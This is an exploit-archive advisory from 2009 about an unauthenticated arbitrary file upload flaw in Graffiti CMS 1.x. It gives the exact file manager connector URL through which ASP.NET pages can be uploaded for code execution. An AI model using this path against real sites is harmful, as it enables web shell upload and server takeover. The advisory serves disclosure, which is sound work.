Graffiti CMS 1.x - Arbitrary File Upload
| EKU-ID: 17392 | CVE: OSVDB-58101 | OSVDB-ID: |
| Author: Alexander Concha | Published: 2009-09-10 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 17392 | CVE: OSVDB-58101 | OSVDB-ID: |
| Author: Alexander Concha | Published: 2009-09-10 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
Graffiti CMS includes a file manager component that allows unauthenticated users to upload files (including asp.net pages which allow code execution). All versions are affected by this vulnerability. To exploit this issue, it only suffices to access to the following URL. http://DOMAIN_TLD/GRAFFITI_CMS_INSTALL_DIR/__utility/Telligent_Editor/editor/filemanager/browser/default/browser.html?connector=../../connectors/aspx/connector.aspx # milw0rm.com [2009-09-10]